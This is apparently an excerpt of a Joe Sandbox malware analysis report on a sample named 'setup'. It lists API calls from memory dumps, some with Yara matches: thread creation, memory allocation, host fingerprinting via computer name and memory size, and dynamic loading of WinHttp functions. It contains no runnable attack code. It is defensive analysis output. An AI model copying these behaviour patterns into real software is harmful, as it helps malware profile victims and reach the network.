• MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File$CreateMappingView
• String ID:
• API String ID: 3452162329-0
APIs
• CreateFileMappingW.KERNELBASE(?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000,00000000), ref: 00C92660
• MapViewOfFile.KERNEL32(00000001,?,?,-30C80583,-5BD6DA1A,?,00000000,?,-00000002C59711D4,00054AC4,00000000,00C72731,000000FF,000000FF,0000000A,00000000), ref: 00C92CE7
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File$CreateMappingView
• String ID:
• API String ID: 3452162329-0
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 01020A01
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_setup.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: ,
• API String ID: 2422867632-3772416878
Strings
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID:
• String ID: &2$sa
• API String ID: 0-4107202647
APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 01020618
Memory Dump Source
• Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_setup.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• GetPhysicallyInstalledSystemMemory.KERNEL32(?), ref: 0302F5BE
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID:
• API String ID: 3960555810-0
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Wuv7
• API String ID: 2994545307-3833346499
APIs
• LdrInitializeThunk.NTDLL(03044250,76E87000,00000018,?,?,00000018,?,?,?), ref: 03040C0E
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 597feed10584dc727962c8a409781f9e7ef7a6d8a72189cfac9957ddf4816537
                                                                                                                          • Instruction ID: 01bb1f6a35c514b0d9b7d2eec70899516c83f8769479858db118537b49f060e0
                                                                                                                          • Opcode Fuzzy Hash: 597feed10584dc727962c8a409781f9e7ef7a6d8a72189cfac9957ddf4816537
                                                                                                                          • Instruction Fuzzy Hash: 0CA19EBAA063205BE714DE24DC9173BBAD7EFD5304F1DC53CE8859B285E6389D058392
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4ce254eab85abe4ba5409214a594d3acffff572236845981582d63cc14067286
                                                                                                                          • Instruction ID: 096abbea50ff2c77f70fcc77a9c6eaceddb63095931536afa2adc5759f8b6f41
                                                                                                                          • Opcode Fuzzy Hash: 4ce254eab85abe4ba5409214a594d3acffff572236845981582d63cc14067286
                                                                                                                          • Instruction Fuzzy Hash: 5981E0B96422008BD718CF65C89176ABBE3FFC8321F1CC2BCC4458B759DB7899468790
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 45d2de15aa49bb093fedcbe424a56aa6b240e143da53ac668ee22c79644bded3
                                                                                                                          • Instruction ID: f9966da4349eca268e9583181cf06ee88fc948dfc9133847905b09d4a86387f7
                                                                                                                          • Opcode Fuzzy Hash: 45d2de15aa49bb093fedcbe424a56aa6b240e143da53ac668ee22c79644bded3
                                                                                                                          • Instruction Fuzzy Hash: 3E5139B5E0A7019BD354DE28D840B6BF3EBABC6314F19C63CE8999B295E731DC018781
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b9e6763a1d344406fe9a887a77949c58c0caf34a0f4062ea90d0258b25688924
                                                                                                                          • Instruction ID: 0ddfaec357c5476707828ea0820ff062de26cb75b3df10ef175240af4ffd3386
                                                                                                                          • Opcode Fuzzy Hash: b9e6763a1d344406fe9a887a77949c58c0caf34a0f4062ea90d0258b25688924
                                                                                                                          • Instruction Fuzzy Hash: 8F51F87661B7108FD324CA28C55036EBBD6ABC6328F198B2DE4A58B3D1D774C945C782
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 897ef1cf6222e2784aff91f6058a266ea0e8f90faa83ece5fdef40f295fc54b3
                                                                                                                          • Instruction ID: 27f5e4733ec5c5e376a434c250600ec191e05fce150ad63956644b05609b649f
                                                                                                                          • Opcode Fuzzy Hash: 897ef1cf6222e2784aff91f6058a266ea0e8f90faa83ece5fdef40f295fc54b3
                                                                                                                          • Instruction Fuzzy Hash: C451F97125C3818FE310CF58CC8076BB7E2FBC5314F18896CE6915B6C2D7B999048B86

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00C3E142
                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00C3E1B4
                                                                                                                          • GlobalHandle.KERNEL32(?), ref: 00C3E1BE
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00C3E1D0
                                                                                                                          • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 00C3E1EB
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C3E1F6
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00C3E243
                                                                                                                          • GlobalHandle.KERNEL32(?), ref: 00C3E257
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00C3E262
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00C3E271
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2667261700-0
                                                                                                                          • Opcode ID: 2deaf5bc22934e9bf51235a81862553461264d0e2614621739c3a2df5ef1f948
                                                                                                                          • Instruction ID: e22ba81acff3e23dfad1d565a284a1f007606236423dd2dd380a5d528ffdbae0
                                                                                                                          • Opcode Fuzzy Hash: 2deaf5bc22934e9bf51235a81862553461264d0e2614621739c3a2df5ef1f948
                                                                                                                          • Instruction Fuzzy Hash: C1416D71610216EFDB189F64D889BAEBBF8FF05301F10426AE815D75E1EB71EA50CB90

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00C3DEF2
                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 00C3DEFD
                                                                                                                          • GetSystemMetrics.USER32(00000002), ref: 00C3DF08
                                                                                                                          • GetSystemMetrics.USER32(00000003), ref: 00C3DF16
                                                                                                                          • GetDC.USER32(00000000), ref: 00C3DF24
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C3DF2F
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C3DF3B
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00C3DF47
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1031845853-0
                                                                                                                          • Opcode ID: 98510ff12606df09c56b4f3dd0b70b8e8bc5b6a858fbcedb6d1e880f95ab07a0
                                                                                                                          • Instruction ID: f96eb6a61486ccc18aae6c16f287bce5ffe455f46130cc349ee0b9c54d57d899
                                                                                                                          • Opcode Fuzzy Hash: 98510ff12606df09c56b4f3dd0b70b8e8bc5b6a858fbcedb6d1e880f95ab07a0
                                                                                                                          • Instruction Fuzzy Hash: FCF04431A40711ABE7001F71EC1DB6E3B60FB41742F09862AF202CA1D0EBB481218FC0

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetComputerNameExA.KERNEL32(00000006,2E27282B,?), ref: 03030A0D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ComputerName
                                                                                                                          • String ID: &sjK$+('.
                                                                                                                          • API String ID: 3545744682-207329785
                                                                                                                          • Opcode ID: f96587cc0b21d7a254be4cf676f5d5727ddabfa226b7769d1e87c0ecb165053d
                                                                                                                          • Instruction ID: ecddced637af39d42bc0e96d53408e8f9244deb9c2f15190088e2fde5acdd0cd
                                                                                                                          • Opcode Fuzzy Hash: f96587cc0b21d7a254be4cf676f5d5727ddabfa226b7769d1e87c0ecb165053d
                                                                                                                          • Instruction Fuzzy Hash: EE5129B6651B029BD309CF29C894362FBE2FF96304F19865DC096C7790E778E505CB90

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetComputerNameExA.KERNEL32(00000005,?,?), ref: 0302F1E3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_3001000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ComputerName
                                                                                                                          • String ID: %8#$?26=
                                                                                                                          • API String ID: 3545744682-1344153340
                                                                                                                          • Opcode ID: 8169e16fa1142d7270bd8b252fba075420a2c5c694522361a19a1ceffa818467
                                                                                                                          • Instruction ID: 118099aa00bea658c634ab1dfe273898727e7dc41d231b452fdb399f158f5a06
                                                                                                                          • Opcode Fuzzy Hash: 8169e16fa1142d7270bd8b252fba075420a2c5c694522361a19a1ceffa818467
                                                                                                                          • Instruction Fuzzy Hash: FA119EB06056438BE719CF28D860762FBF1BF56350F488689C0969B386CB38D985CBA1
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,?), ref: 01074445
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_1020000_setup.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: .dll
                                                                                                                          • API String ID: 1029625771-2738580789
                                                                                                                          • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                          • Instruction ID: 70ffa40f7727a0c779c159ed34459e5bbcd138345b650dbb7c9f254130efa7e2
                                                                                                                          • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                          • Instruction Fuzzy Hash: 3B210675E002959FEB62DF6CC844BAE7FE4EF01224F1841ACD985DBA42DB30E845CB54
APIs
  • Part of subcall function 00C3F329: LeaveCriticalSection.KERNEL32(?,?,?,?,00C2F254,00000001), ref: 00C3F33D
  • Part of subcall function 00C6FC3E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00C483B0,?,00CBB89C,00000002), ref: 00C6FC9F
• __EH_prolog3.LIBCMT ref: 00C3E47F
  • Part of subcall function 00C3DF50: TlsAlloc.KERNEL32 ref: 00C3DF6F
  • Part of subcall function 00C3DF50: InitializeCriticalSection.KERNEL32(?), ref: 00C3DF80
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CriticalSection$AllocExceptionH_prolog3InitializeLeaveRaise
• String ID: PL
• API String ID: 4292405150-2418937307
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0300CDDA
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0300CF2A
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0107307F
Memory Dump Source
• Source File: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, Offset: 01020000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1020000_setup.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• RtlAllocateHeap.NTDLL(00000008,?,?,?,00C83F96,00000001,00000364,?,00000006,000000FF,?,?,00C77EA7,00C8494D), ref: 00C84124
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
• CreateMutexA.KERNEL32(00000000,00000000,00000000,00000200,00000000,00000004), ref: 00C6CC69
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0300CF8B
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
APIs
• GetForegroundWindow.USER32 ref: 0304184C
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,A2E6E197,03008AFA,929D7C9F), ref: 0303F1E0
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• RtlFreeHeap.NTDLL(?,00000000), ref: 0303F20E
Memory Dump Source
• Source File: 00000000.00000002.4142025907.0000000003001000.00000020.10000000.00040000.00000000.sdmp, Offset: 03001000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3001000_setup.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C012F5: FreeLibrary.KERNEL32(00CC4DA4,?,00C0131E,00C01752,Mozilla/4.0,00000000), ref: 00C012FF
                                                                                                                          • LoadLibraryW.KERNEL32(Winhttp.dll,00C01752,Mozilla/4.0,00000000), ref: 00C01327
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpOpen,?), ref: 00C0134F
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpSetTimeouts), ref: 00C01361
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpCrackUrl), ref: 00C01373
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpConnect), ref: 00C01385
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpOpenRequest), ref: 00C01397
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpCloseHandle), ref: 00C013A9
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpSetOption), ref: 00C013BB
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpWriteData), ref: 00C013CD
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpReadData), ref: 00C013DF
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpSendRequest), ref: 00C013F1
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpQueryHeaders), ref: 00C01403
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpQueryDataAvailable), ref: 00C01415
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpReceiveResponse), ref: 00C01427
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpGetProxyForUrl), ref: 00C01439
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpAddRequestHeaders), ref: 00C0144B
                                                                                                                          • GetProcAddress.KERNEL32(WinHttpGetIEProxyConfigForCurrentUser), ref: 00C0145D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                          • String ID: WinHttpAddRequestHeaders$WinHttpCloseHandle$WinHttpConnect$WinHttpCrackUrl$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpQueryHeaders$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$WinHttpSetOption$WinHttpSetTimeouts$WinHttpWriteData$Winhttp.dll
                                                                                                                          • API String ID: 2449869053-1963091010
                                                                                                                          • Opcode ID: b71ab532b4c145786fc6329e90aa542211e8d3214becfc77499eb292cac57343
                                                                                                                          • Instruction ID: 793509d08c2ce23ca5a8fdb091b18891679414a2bbbac60298d10b19d1980107
                                                                                                                          • Opcode Fuzzy Hash: b71ab532b4c145786fc6329e90aa542211e8d3214becfc77499eb292cac57343
                                                                                                                          • Instruction Fuzzy Hash: A141E870841311AEDF2A7BA1FD68F9E3FE1EB05B46F09C42AE812462F1D7B44494DE41
                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,74E2F860,00000000,00000000), ref: 00C1F33A
                                                                                                                            • Part of subcall function 00C1EE67: FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,?,?,00C1F357,?,?), ref: 00C1EE79
                                                                                                                            • Part of subcall function 00C1EE67: FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00C1EE8F
                                                                                                                            • Part of subcall function 00C1EE67: wsprintfW.USER32 ref: 00C1EED4
                                                                                                                            • Part of subcall function 00C1EBE3: lstrlenW.KERNEL32(00CC4EA8,?,00000000,74E2F860,00000000,?,?,00C1FC65,00000000,%s caused %s (0x%08p) in module %s at %04p:%08p.,?,00000000,?,Unknown,?,?), ref: 00C1EC04
                                                                                                                            • Part of subcall function 00C1EBE3: WriteFile.KERNEL32(?,00CC4EA8,00000000,?,?,00C1FC65,00000000,%s caused %s (0x%08p) in module %s at %04p:%08p.,?,00000000,?,Unknown,?,?), ref: 00C1EC11
                                                                                                                            • Part of subcall function 00C1EBE3: wvsprintfW.USER32(?,?,?), ref: 00C1EC2D
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000206), ref: 00C1F38D
                                                                                                                          • lstrcpyW.KERNEL32(?,Unknown), ref: 00C1F3AA
                                                                                                                            • Part of subcall function 00C1F2D1: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2E3
                                                                                                                            • Part of subcall function 00C1F2D1: GetProcAddress.KERNEL32(00000000), ref: 00C1F2EA
                                                                                                                            • Part of subcall function 00C1F2D1: GetCurrentProcess.KERNEL32(00000000,?,?,00C1F57C,00000000,%d MBytes user address space free.), ref: 00C1F2FD
                                                                                                                          • GetUserNameW.ADVAPI32(?,000000C6), ref: 00C1F3DA
                                                                                                                          • lstrcpyW.KERNEL32(?,Unknown), ref: 00C1F3EC
